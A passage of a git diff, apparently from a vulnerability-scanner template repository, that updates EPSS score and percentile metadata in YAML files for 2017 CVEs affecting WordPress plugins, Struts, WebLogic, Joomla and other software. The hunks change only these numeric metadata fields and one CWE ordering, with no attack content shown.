cve-id: CVE-2017-17043 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.62327 + epss-percentile: 0.62474 cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 4adc2176e9..65d29eafbc 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-17059 cwe-id: CWE-79 epss-score: 0.00261 - epss-percentile: 0.63639 + epss-percentile: 0.63794 cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 5a14e9e547..f0352a4741 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-17451 cwe-id: CWE-79 epss-score: 0.00178 - epss-percentile: 0.54904 + epss-percentile: 0.5507 cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index e074c69ee0..18fa86e540 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-17562 cwe-id: CWE-20 epss-score: 0.97455 - epss-percentile: 0.99951 + epss-percentile: 0.99952 cpe: cpe:2.3:a:embedthis:goahead:*:*:*:*:*:*:*:* metadata: max-request: 65 diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index 60f4ad3759..3876d9d04f 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2017-17731 cwe-id: CWE-89 - epss-score: 0.11468 - epss-percentile: 0.94674 + epss-score: 0.20241 + epss-percentile: 0.95907 cpe: cpe:2.3:a:dedecms:dedecms:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index a0a8240e5b..3863652610 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-17736 cwe-id: CWE-425 epss-score: 0.1483 - epss-percentile: 0.95249 + epss-percentile: 0.95265 cpe: cpe:2.3:a:kentico:kentico_cms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index d980b4e413..533b7253ad 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-18024 cwe-id: CWE-79 epss-score: 0.00074 - epss-percentile: 0.30553 + epss-percentile: 0.30437 cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index ac44ceb52c..03c41999d0 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18487 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:google_adsense_project:google_adsense:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index dd8d4221ad..a41b382f00 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18490 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:contact_form_multi:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index 56fd59d36a..25b621f0ea 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18491 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:contact_form:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index d11eae063b..a1419f1d5d 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18492 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:contact_form_to_db:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index 71c226bddd..add6758764 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18493 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:custom_admin_page:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index a523ee5465..b50cc974da 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18494 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:custom_search:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index 0d096aa1da..47578433f0 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18496 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:htaccess:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index 03ef01f738..fcc2f3ec65 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18500 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61087 + epss-percentile: 0.61251 cpe: cpe:2.3:a:bestwebsoft:social_buttons_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index 5818a5a229..fbd815977a 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18501 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61087 + epss-percentile: 0.61251 cpe: cpe:2.3:a:bestwebsoft:social_login:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index b2ec89a2e9..5220fada0e 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18502 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61087 + epss-percentile: 0.61251 cpe: cpe:2.3:a:bestwebsoft:subscriber:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index a8e323025f..2ea8a84582 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18505 cwe-id: CWE-79 epss-score: 0.00163 - epss-percentile: 0.52755 + epss-percentile: 0.52843 cpe: cpe:2.3:a:bestwebsoft:twitter_button:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index 1f08cd3920..d3239223e2 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18516 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:linkedin:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index b6dfce9655..66cc890559 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18517 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:pinterest:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index 7cf882181d..e6c7ce7940 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18518 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:smtp:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index 6aedd597c4..996d3a0b37 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18527 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:pagination:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index 9a75544819..5f2f23271d 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18528 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:pdf_\&_print:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index 97101f33a1..cee566fcb0 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18529 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index 103e1b5117..a566cdf4b2 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18530 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:rating:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index 8c8d971094..c5290329ed 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18532 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:realty:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18536.yaml b/http/cves/2017/CVE-2017-18536.yaml index 6228a0c036..5a89ef90ac 100644 --- a/http/cves/2017/CVE-2017-18536.yaml +++ b/http/cves/2017/CVE-2017-18536.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-18536 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:fullworks:stop_user_enumeration:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index f3b2d948da..662edf1eb7 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18537 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:visitors_online:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index e6b9b285dd..f6175a9b94 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18542 cwe-id: CWE-79 epss-score: 0.00221 - epss-percentile: 0.59985 + epss-percentile: 0.60138 cpe: cpe:2.3:a:bestwebsoft:zendesk_help_center:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index f9071584c3..d7c2f6995c 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18556 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:google_analytics:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index 64becb22a8..ec44381fb1 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18557 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:google_maps:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index 6dc1b630f6..89242ae85d 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18558 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:testimonials:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index 5181823084..35e97ced95 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18562 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:error_log_viewer:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index 38c4ce4c74..b88b76a1d3 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18564 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:sender:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index f8acbd0b2a..cebaffebce 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18565 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:updater:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index 346a03877e..1951293e6b 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18566 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36784 + epss-percentile: 0.36836 cpe: cpe:2.3:a:bestwebsoft:user_role:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 258c5ab66a..0ac8ac70e8 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-18598 cwe-id: CWE-79 epss-score: 0.00094 - epss-percentile: 0.39158 + epss-percentile: 0.39214 cpe: cpe:2.3:a:designmodo:qards:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-18638.yaml b/http/cves/2017/CVE-2017-18638.yaml index 26ee7da508..b003b043e5 100644 --- a/http/cves/2017/CVE-2017-18638.yaml +++ b/http/cves/2017/CVE-2017-18638.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-18638 cwe-id: CWE-918 epss-score: 0.00902 - epss-percentile: 0.80858 + epss-percentile: 0.80938 cpe: cpe:2.3:a:graphite_project:graphite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index af4e613608..15c94dc89a 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.4 cve-id: CVE-2017-3506 epss-score: 0.96935 - epss-percentile: 0.99655 + epss-percentile: 0.99662 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-3528.yaml b/http/cves/2017/CVE-2017-3528.yaml index 33a6155783..42dbd57f0a 100644 --- a/http/cves/2017/CVE-2017-3528.yaml +++ b/http/cves/2017/CVE-2017-3528.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-3528 cwe-id: CWE-601 epss-score: 0.00865 - epss-percentile: 0.804 + epss-percentile: 0.80496 cpe: cpe:2.3:a:oracle:applications_framework:12.1.3:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-4011.yaml b/http/cves/2017/CVE-2017-4011.yaml index c7a10196d9..4191ce4aff 100644 --- a/http/cves/2017/CVE-2017-4011.yaml +++ b/http/cves/2017/CVE-2017-4011.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-4011 cwe-id: CWE-79 epss-score: 0.00142 - epss-percentile: 0.49807 + epss-percentile: 0.4991 cpe: cpe:2.3:a:mcafee:network_data_loss_prevention:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-5487.yaml b/http/cves/2017/CVE-2017-5487.yaml index c96a2cf7c9..227097dbaf 100644 --- a/http/cves/2017/CVE-2017-5487.yaml +++ b/http/cves/2017/CVE-2017-5487.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-5487 cwe-id: CWE-200 epss-score: 0.97179 - epss-percentile: 0.99767 + epss-percentile: 0.99773 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index c95111f93c..2af1f7f898 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-5521 cwe-id: CWE-200 epss-score: 0.97402 - epss-percentile: 0.99907 + epss-percentile: 0.99914 cpe: cpe:2.3:o:netgear:r6200_firmware:1.0.1.56_1.0.43:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-5631.yaml b/http/cves/2017/CVE-2017-5631.yaml index 37e6657b09..9e4cd30bdb 100644 --- a/http/cves/2017/CVE-2017-5631.yaml +++ b/http/cves/2017/CVE-2017-5631.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-5631 cwe-id: CWE-79 epss-score: 0.00286 - epss-percentile: 0.65239 + epss-percentile: 0.65407 cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index f89dc4f11d..166b732d1e 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -21,7 +21,7 @@ info: cvss-score: 10 cve-id: CVE-2017-5638 cwe-id: CWE-20 - epss-score: 0.97536 + epss-score: 0.97535 epss-percentile: 0.99993 cpe: cpe:2.3:a:apache:struts:2.3.5:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index c2c9cb07a3..793c4393ec 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-5689 - epss-score: 0.97416 - epss-percentile: 0.99917 + epss-score: 0.97418 + epss-percentile: 0.99921 cpe: cpe:2.3:o:intel:active_management_technology_firmware:6.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-5982.yaml b/http/cves/2017/CVE-2017-5982.yaml index 582ac0dd8a..d7df7659d8 100644 --- a/http/cves/2017/CVE-2017-5982.yaml +++ b/http/cves/2017/CVE-2017-5982.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-5982 cwe-id: CWE-22 epss-score: 0.0488 - epss-percentile: 0.91912 + epss-percentile: 0.91976 cpe: cpe:2.3:a:kodi:kodi:17.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index 164fb4fc21..c8806bec7b 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2017-6090 cwe-id: CWE-434 epss-score: 0.97204 - epss-percentile: 0.99782 + epss-percentile: 0.99787 cpe: cpe:2.3:a:phpcollab:phpcollab:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-7269.yaml b/http/cves/2017/CVE-2017-7269.yaml index 05f932de93..67557bf1f8 100644 --- a/http/cves/2017/CVE-2017-7269.yaml +++ b/http/cves/2017/CVE-2017-7269.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-7269 cwe-id: CWE-119 epss-score: 0.97121 - epss-percentile: 0.99737 + epss-percentile: 0.99746 cpe: cpe:2.3:a:microsoft:internet_information_server:6.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-7391.yaml b/http/cves/2017/CVE-2017-7391.yaml index 94ddb0d403..182f6deb84 100644 --- a/http/cves/2017/CVE-2017-7391.yaml +++ b/http/cves/2017/CVE-2017-7391.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-7391 cwe-id: CWE-79 epss-score: 0.00195 - epss-percentile: 0.57205 + epss-percentile: 0.57376 cpe: cpe:2.3:a:magmi_project:magmi:0.7.22:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index 9fe0c39a2e..98879d7e9d 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -26,7 +26,7 @@ info: cve-id: CVE-2017-7615 cwe-id: CWE-640 epss-score: 0.97404 - epss-percentile: 0.9991 + epss-percentile: 0.99916 cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:* metadata: max-request: 5 diff --git a/http/cves/2017/CVE-2017-7855.yaml b/http/cves/2017/CVE-2017-7855.yaml index 115006834c..f5e8de9ff5 100644 --- a/http/cves/2017/CVE-2017-7855.yaml +++ b/http/cves/2017/CVE-2017-7855.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2017-7855 cwe-id: CWE-79 epss-score: 0.0009 - epss-percentile: 0.37631 + epss-percentile: 0.37683 cpe: cpe:2.3:a:icewarp:server:11.3.1.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-7921.yaml b/http/cves/2017/CVE-2017-7921.yaml index ccfcb02669..835da52cf3 100644 --- a/http/cves/2017/CVE-2017-7921.yaml +++ b/http/cves/2017/CVE-2017-7921.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-7921 cwe-id: CWE-287 epss-score: 0.01361 - epss-percentile: 0.84686 + epss-percentile: 0.84777 cpe: cpe:2.3:o:hikvision:ds-2cd2032-i_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-7925.yaml b/http/cves/2017/CVE-2017-7925.yaml index a662e87ebe..cd1bfe974f 100644 --- a/http/cves/2017/CVE-2017-7925.yaml +++ b/http/cves/2017/CVE-2017-7925.yaml @@ -18,9 +18,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-7925 - cwe-id: CWE-522,CWE-260 + cwe-id: CWE-260,CWE-522 epss-score: 0.35031 - epss-percentile: 0.96706 + epss-percentile: 0.96734 cpe: cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml index 32b4768733..af0b3ebac0 100644 --- a/http/cves/2017/CVE-2017-8229.yaml +++ b/http/cves/2017/CVE-2017-8229.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2017-8229 cwe-id: CWE-255 - epss-score: 0.90501 - epss-percentile: 0.98535 + epss-score: 0.89327 + epss-percentile: 0.98501 cpe: cpe:2.3:o:amcrest:ipm-721s_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index df6368bd23..84d9956e79 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-8917 cwe-id: CWE-89 epss-score: 0.97555 - epss-percentile: 0.99996 + epss-percentile: 0.99997 cpe: cpe:2.3:a:joomla:joomla\!:3.7.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-9140.yaml b/http/cves/2017/CVE-2017-9140.yaml index 7d0ad11159..1138f9eafc 100644 --- a/http/cves/2017/CVE-2017-9140.yaml +++ b/http/cves/2017/CVE-2017-9140.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2017-9140 cwe-id: CWE-79 epss-score: 0.00191 - epss-percentile: 0.56592 + epss-percentile: 0.56757 cpe: cpe:2.3:a:progress:telerik_reporting:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index 497bb7d292..64ba29cbcd 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-9288 cwe-id: CWE-79 epss-score: 0.00168 - 